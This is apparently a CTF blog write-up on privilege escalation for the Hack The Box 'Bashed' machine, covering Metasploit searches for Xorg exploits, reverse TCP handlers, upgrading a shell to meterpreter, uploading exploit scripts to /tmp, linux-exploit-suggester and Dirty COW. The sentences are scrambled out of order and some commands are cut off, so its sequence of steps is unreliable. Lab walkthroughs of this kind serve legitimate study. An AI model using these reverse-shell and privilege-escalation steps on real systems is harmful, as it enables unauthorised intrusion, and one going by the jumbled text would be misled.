I try to exploit all of them but nothing worked, so I move on to the dirty cow. = # Name Disclosure Date Rank Check DescriptionĠ exploit/aix/local/xorg_x11_server great Yes Xorg X11 Server Local Privilege Escalationġ exploit/multi/local/xorg_x11_suid_server good Yes Xorg X11 Server SUID logfile Privilege EscalationĢ exploit/multi/local/xorg_x11_suid_server_modulepath good Yes Xorg X11 Server SUID modulepath Privilege Escalation I search for each CVE in msfconsole and find a potential candidate: msf6 exploit (multi/handler ) > search 14665 I then drop into a usual shell with shell, make the script executable and run it chmod +x I download it on my local machine and upload it to the server thanks to my meterpreter shell: meterpreter > upload Challenges/htb/bashed/ /tmp To automatically get some exploit suggestions I use linux-exploit-suggester. The first thing to try is look for existing public privilege escalation exploits. I used some scripts, then the payload reverse_bash but this way worked best for me. I didn't manage to make it work on the first try. Now I can select my new fancy meterpreter shell with sessions 2. Started reverse TCP handler on 10.10.14.9:4433 msf6 exploit (multi/handler ) > sessions -u 1 Executing 'post/multi/manage/shell_to_meterpreter' on session (s ): Upgrading session ID: 1 Starting exploit/multi/handler Then sessions -u 1 to upgrade the session. To upgrade it to a meterpreter shell I use background to put the current session in the background. I now have a nicer shell, but still not nice enough. Started reverse TCP handler on 10.10.14.9:4446
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |